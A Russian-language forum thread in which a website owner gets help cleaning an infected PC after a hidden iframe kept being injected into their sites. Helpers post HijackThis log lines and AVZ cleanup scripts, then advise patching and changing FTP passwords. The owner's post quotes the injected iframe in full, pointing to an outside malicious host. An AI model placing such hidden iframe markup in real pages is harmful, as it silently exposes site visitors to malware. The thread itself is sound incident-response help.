У меня уже несколько раз в мои сайты вставляется вот такая строчка:
<iframe src="http://a3t.ru:8080/ts/in.cgi?pepsi89" width=125 height=125 style="visibility: hidden"></iframe>
Пароли уже удалил и ФТП. Еще есть подозрения, что еще какая-то гадость есть на компьютере, спасибо!
Будь в курсе!Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
O2 - BHO: My Search BHO - {014DA6C1-189F-421a-88CD-07CFE51CFF10} - C:\Program Files\MySearch\bar\1.bin\S4BAR.DLL (file missing)
O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - (no file)
O3 - Toolbar: My Search Bar - {014DA6C9-189F-421a-88CD-07CFE51CFF10} - C:\Program Files\MySearch\bar\1.bin\S4BAR.DLL (file missing)
Выполните скрипт в AVZ:
Код:
begin
SetAVZGuardStatus(True);
QuarantineFile('C:\Documents and Settings\Pika\Главное меню\Программы\Автозагрузка\rncsys32.exe','');
QuarantineFile('C:\Documents and Settings\Pika\Application Data\adwind.exe','');
DeleteFile('C:\Documents and Settings\Pika\Application Data\adwind.exe');
DeleteFile('C:\Documents and Settings\Pika\Главное меню\Программы\Автозагрузка\rncsys32.exe');
BC_ImportDeletedList;
ExecuteSysClean;
BC_Activate;
RebootWindows(true);
end.
Компьютер перезагрузится.
Пришлите карантин согласно приложению 3 правил
(загружать тут: http://virusinfo.info/upload_virus.php?tid=49460).
Сделайте новые логи (только п.2 и 3 раздела Диагностика).
begin
BC_DeleteSvc('glaide32');
BC_Activate;
RebootWindows(true);
end.
После перезагрузки сделайте
Диагностика
...
2. Подключитесь к сети Интернет, запустите AVZ*. Вновь откройте меню "Файл"=>"Стандартные скрипты" и отметьте теперь пункт "Скрипт сбора информации для раздела "Помогите!" virusinfo.info". Нажмите "Выполнить отмеченные скрипты". Будет выполнено автоматическое исследование системы, полученный лог avz_sysinfo.htm будет сохранен в директории AVZ в папке "LOG" в архиве virusinfo_syscheck.zip.
3. Запустите HijackThis*. В появившемся окне с пользовательским соглашением нажмите на кнопку I Accept. Если программа не запускается или прекращает работу после запуска, скачайте переименованный файл программы HijackThis здесь и в дальнейшем используйте его. Нажмите на кнопку "Do a system scan and save a logfile".
Сохраните лог. По умолчанию лог сохраняется в папке программы с именем hijackthis.log
Отлично!
В логах больше ничего подозрительного. Bonjour лучше удалить - неполезная программа.
Настоятельно рекомендуется установить SP3 + последующие обновления.
Потом снова поменяйте пароль на фтп и очистите страницы своих сайтов от чуждого кода.
Отлично!
В логах больше ничего подозрительного. Bonjour лучше удалить - неполезная программа.
Настоятельно рекомендуется установить SP3 + последующие обновления.
Потом снова поменяйте пароль на фтп и очистите страницы своих сайтов от чуждого кода.
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru: